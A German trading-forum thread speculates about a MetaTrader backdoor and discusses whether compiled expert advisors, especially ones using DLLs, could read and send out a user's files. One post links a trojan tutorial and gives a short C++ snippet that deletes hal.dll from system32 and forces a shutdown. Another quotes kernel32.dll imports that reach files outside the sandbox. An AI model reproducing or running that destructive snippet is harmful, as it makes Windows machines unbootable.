MT5 Trojaner

[whipsaw]

LOL, bislang ist es nur ein Gerücht. Wenn etwas an der Geschichte dran wäre, müsste es bei Metaquotes einen 'Maulwurf' geben. Das wiederum bezweifle ich, da die Firma für ihre restriktive Informationspolitik sowie weitreichende Sicherheitsmaßnahmen, um z.B. Wirtschaftsspionage etc. vorzubeugen, bekannt ist.

 

 

I heard a rumor about MT having a "back window" which allows the provider to "see" programmed strategy's so as to better make a market.

 

Quelle: ForexFactory

 

 

Wir hatten jüngst eine ähnliche Diskussion, bei der sich die Meinung durchgesetzt hatte, dass das nicht möglich sei. Ich halte dagegen, dass mit den entsprechenden technischen Hilfsmitteln alles denkbar wäre.

[Krümel]

Wir hatten jüngst eine ähnliche Diskussion, bei der sich die Meinung durchgesetzt hatte, dass das nicht möglich sei. Ich halte dagegen, dass mit den entsprechenden technischen Hilfsmitteln alles denkbar wäre.

Machbar ist es, denke ich. Sie brauchen ja nur die "typischen" Verzeichnisse im Metatrader durchsuchen, alles einsammeln, was nicht ihr's ist und im Hintergrund archivieren zippen (mit ner "mitgelieferten" Zip-Funktion) und als Stream zum Broker schicken, speichern, wieder entzippen und dann mal manuell durchgehen. (Die einfache Variante) Muss man ja nicht bei allen Kunden machen, reicht ja, wenn man sich die profitablen raussucht, das sind ja nicht so viele .

Das einzige, was sie m.M.n. davon abhalten könnte ist der Vertrauens-/Imageverlust, wenn es rauskommt.

[whipsaw]

Das einzige, was sie m.M.n. davon abhalten könnte ist der Vertrauens-/Imageverlust, wenn es rauskommt.

 

Yep, sehe ich auch so.

 

Für die *schmutzigen* schwierigen Tasks hat man aber starke und erfahrene Partner.

[tnickel]

Yep, sehe ich auch so.

 

Für die *schmutzigen* schwierigen Tasks hat man aber starke und erfahrene Partner.

 

Hi,

ich glaub kaum das Metatrader oder ein Broker sowas macht.

 

Viel gefährlicher finde ich es wenn man einen "unbekannten" EA mit DLL benutzt.

Der könnte mit leichtigkeit die Platte absuchen und alles wertvolle einfach per email rausschicken.

 

Geht sowas eigentlich auch ohne DLL. Also rein mit der Programmiersprache mql5?

 

Das fände ich dann schon gefährlich.

Im Internet gibt es viele kostenlose EA´s in compilierter Form, da weiss man ja nicht was drin ist.

thomas

[Vola]

ich glaub kaum das Metatrader oder ein Broker sowas macht.

Naja, mit dem Glauben in diesem Business ist das so eine Sache.

Ich hätte vor Jahren auch nicht gedacht, dass eine so große Bude wie FXCM u.a. es "nötig hat" seine Kunden zu beschubsen

(Extrenm nett ausgedrückt)

 

Geht sowas eigentlich auch ohne DLL. Also rein mit der Programmiersprache mql5?

Gute Frage, mal sehen was die Cracks dazu sagen. Ich denke aber eher nicht, dass es allein über MQL geht.

 

Im Internet gibt es viele kostenlose EA´s in compilierter Form, da weiss man ja nicht was drin ist.

Die meisten lassen sich jedoch relativ problemlos decompilieren, wenn sie mit einer .dll Verschlüsselung im Code ausgestattet sind wird es schon sehr viel schwieriger, habe mir aber aus kompetenter Quelle sagen lassen, dass selbst dieses möglich ist.

(Mit relativ viel Aufwand und Zeit, ähnlich Brute Force Attacken)

[Rumpel]

Gute Frage, mal sehen was die Cracks dazu sagen. Ich denke aber eher nicht, dass es allein über MQL geht.

 

Mit MQL selbst wohl kaum, wäre schlimm wenn wir soweit schon wären.

 

Aber mit einer dll ist schon so einiges mehr möglich.

 

Tante Edit: Letztendlich verhällt es sich da genauso wie mit kostenloser Software aus dem Internet. Manchmal fasst man sich ja echt an den Kopf wie schnell irgendwelche Programme aus "Downloadportalen" installiert werden ohne drüber nachzudenken was da passieren kann.

[wh]

Rumpel hat Recht. Mit C/C++ sollte das im Handumdrehen gemacht sein.

 

http://www.icynorth.com/development/createdlltutorial.html

http://www.gohacking.com/2009/04/how-to-make-a-trojan-horse.html

 

#include<iostream.h>
#include<stdlib.h>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

[Vola]

Rumpel hat Recht. Mit C/C++ sollte das im Handumdrehen gemacht sein.

Bin ja eigentlich vom Verständnis fast so gut wie TRO in deser Hinsicht

Meinst du nun mit deiner Aussage + Code, dass es nur allein mit MQL möglich ist ?

[wh]

Sowohl als auch. Ich denke, dass es ist schwierig. Ich kann aber meine DLLs einbinden bzw. Systemsachen abändern.

Der "Kreativität" sind keine Grenzen gesetzt. Ein wenig C/C++ und ein paar DAUs und fertig ist das Produkt und der Hype.

 

 

Mit mt4 kann ich

int ShellExecuteA(int hWnd,string lpVerb,string lpFile,string lpParameters,string lpDirectory,int nCmdShow);

.

[Mythos]

Mit mt4 kann ich

int ShellExecuteA(int hWnd,string lpVerb,string lpFile,string lpParameters,string lpDirectory,int nCmdShow);

.

 

? Ist das ein MT4 interner Befehl?

 

Also AFAIK kannst du mit reinem MQL nur auf Dateien im MT-Verzeichnis (files/ und history/) zugreifen. Der Rest des Systems ist nur über DLLs erreichbar. Mit DLL ist dann natürlich alles möglich.

 

EDIT: streich die Frage, MQL kennt keine strings ;)

[wh]

? Ist das ein MT4 interner Befehl?

 

Also AFAIK kannst du mit reinem MQL nur auf Dateien im MT-Verzeichnis (files/ und history/) zugreifen. Der Rest des Systems ist nur über DLLs erreichbar. Mit DLL ist dann natürlich alles möglich.

 

EDIT: streich die Frage, MQL kennt keine strings ;)

 

Kann man nur auf Daten im MT-Verzeichnis zugreifen? Keine Ahnung. Ich denke MT4 als C-Clone ist schon flexibel.

[Mythos]

Kann man nur auf Daten im MT-Verzeichnis zugreifen? Keine Ahnung. Ich denke MT4 als C-Clone ist schon flexibel.

 

Nein, so flexibel ist es nicht. es gibt für Filezugriff nur FileOpen

Opens file for input and/or output. Returns a file handle for the opened file or -1 (if the function fails). To get the detailed error information, call GetLastError() function.

Notes: Files can only be opened in the terminal_directory\experts\files folder (terminal_directory\tester\files if for expert testing) or in its subfolders.

 

und FileOpenHistory

Opens file in the current history directory (terminal_directory\history\server_name) or in its subfolders.

[Der Wolf]

Über den Aufruf von WinAPI-Funktionen müsste es klappen, auf alle Files zugreifen zu können.

Es gibt hierzu einen Grundlagenartikel in der MQL4-Codebase namens "File Operations via WinAPI"

http://articles.mql4.com/720

 

If you still need to work outside the directories (defined for safety reasons), you can call the functions of Windows OS. For this purpose, the functions of API represented in kernel32.dll library are widely used.

 

#import "kernel32.dll"
  int _lopen  (string path, int of);
  int _lcreat (string path, int attrib);
  int _llseek (int handle, int offset, int origin);
  int _lread  (int handle, string buffer, int bytes);
  int _lwrite (int handle, string buffer, int bytes);
  int _lclose (int handle);
#import

 

Ich hab's nicht ausprobiert.

[Mythos]

Über den Aufruf von WinAPI-Funktionen müsste es klappen, auf alle Files zugreifen zu können.

 

Natürlich, verwendet aber eine dll (die kernel32.dll). Sofern man also die Verwendung von dlls verbietet ist zumindest alles außerhalb des MT Ordners sicher.